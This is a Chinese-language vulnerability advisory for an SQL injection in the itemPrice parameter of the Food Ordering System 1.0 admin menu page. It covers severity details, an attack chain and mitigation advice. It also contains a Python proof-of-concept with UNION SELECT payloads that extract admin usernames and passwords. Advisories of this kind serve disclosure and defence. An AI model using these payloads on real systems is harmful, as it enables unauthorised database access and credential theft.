CVE-2025-12315: Food Ordering System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12315

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Food Ordering System 1.0

漏洞概述

CVE-2025-12315是code-projects平台开发的Food Ordering System 1.0中的一个中等严重性SQL注入漏洞。该漏洞位于管理后台的菜单管理功能中，具体影响/admin/menu.php文件中的itemPrice参数。攻击者通过操纵该参数的值，可以注入恶意SQL代码，从而执行未授权的数据库操作。由于该漏洞需要高权限用户权限才能利用，因此主要威胁来自于内部人员的恶意行为或被入侵的高权限账户。漏洞已于2025年10月27日公开披露，且已有公开的利用代码。该漏洞的CVSS评分为4.7，属于中危级别，对系统的机密性、完整性和可用性均造成较低程度的影响。

技术细节

该SQL注入漏洞源于/admin/menu.php文件中对itemPrice参数的处理不当。攻击者在拥有管理员权限的前提下，可以通过构造特殊的SQL语句片段作为itemPrice参数的值来实现注入攻击。常见的SQL注入利用方式包括：1）使用UNION SELECT语句提取数据库中的敏感信息，如用户密码、订单数据等；2）使用布尔型盲注技术通过页面响应差异推断数据库内容；3）使用时间型盲注通过数据库延迟函数判断条件真假。该漏洞的利用需要高权限（PR:H），这意味着攻击者必须首先获取管理员账户或通过其他手段提升权限。攻击复杂度为低（AC:L），表明利用该漏洞的技术难度不大。防御此类漏洞的标准方法是使用参数化查询或预编译语句，确保用户输入被当作数据而非SQL代码执行。

攻击链分析

STEP 1

步骤1

获取管理员访问权限：攻击者通过钓鱼、社会工程学或其他漏洞获取Food Ordering System的管理员账户凭证

STEP 2

步骤2

定位漏洞点：访问/admin/menu.php页面，找到菜单价格编辑功能

STEP 3

步骤3

构造注入载荷：在itemPrice参数中注入SQL代码，如使用UNION SELECT或布尔盲注技术

STEP 4

步骤4

提取敏感数据：利用注入获取数据库中的用户信息、密码哈希、订单数据等敏感信息

STEP 5

步骤5

横向移动或持久化：使用获取的信息进行进一步攻击或建立持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12315 SQL Injection PoC
# Target: Food Ordering System 1.0 /admin/menu.php
# Payload: SQL injection via itemPrice parameter

target_url = "http://target.com/admin/menu.php"

# SQL Injection Payloads
payloads = [
    # Basic SQL injection to test vulnerability
    "1' OR '1'='1",
    # Union-based injection to extract database version
    "1' UNION SELECT NULL,@@version,NULL,NULL-- -",
    # Extract database name
    "1' UNION SELECT NULL,database(),NULL,NULL-- -",
    # Extract admin table usernames
    "1' UNION SELECT NULL,group_concat(username),NULL,NULL FROM admin-- -",
    # Extract admin table passwords
    "1' UNION SELECT NULL,group_concat(password),NULL,NULL FROM admin-- -"
]

def test_sqli(url, payload):
    """Test SQL injection vulnerability"""
    data = {
        'itemPrice': payload,
        'action': 'update'  # Common action parameter
    }
    try:
        response = requests.post(url, data=data, timeout=10)
        # Check for SQL error messages or successful injection
        if 'SQL' in response.text or 'error' in response.text.lower():
            print(f"[+] Potential vulnerability detected with payload: {payload}")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False

if __name__ == "__main__":
    print("[*] CVE-2025-12315 SQL Injection Test")
    print("[*] Target:", target_url)
    for payload in payloads:
        print(f"[*] Testing payload: {payload}")
        test_sqli(target_url, payload)

影响范围

Food Ordering System 1.0

防御指南

临时缓解措施

立即限制/admin/menu.php页面的访问权限，仅允许受信任的管理员IP访问。同时启用详细的访问日志和数据库审计日志，监控异常的SQL查询行为。建议在生产环境中暂时禁用菜单价格修改功能，等待官方修复补丁发布。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12315
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12315
3 Details https://www.cvedetails.com/cve/CVE-2025-12315/
4 VulDB https://vuldb.com/cve/CVE-2025-12315
5 Link https://code-projects.org/
6 Link https://github.com/kaka00666/food-ordering-cve/issues/2
7 Link https://vuldb.com/?ctiid.329987
8 Link https://vuldb.com/?id.329987
9 Link https://vuldb.com/?submit.677036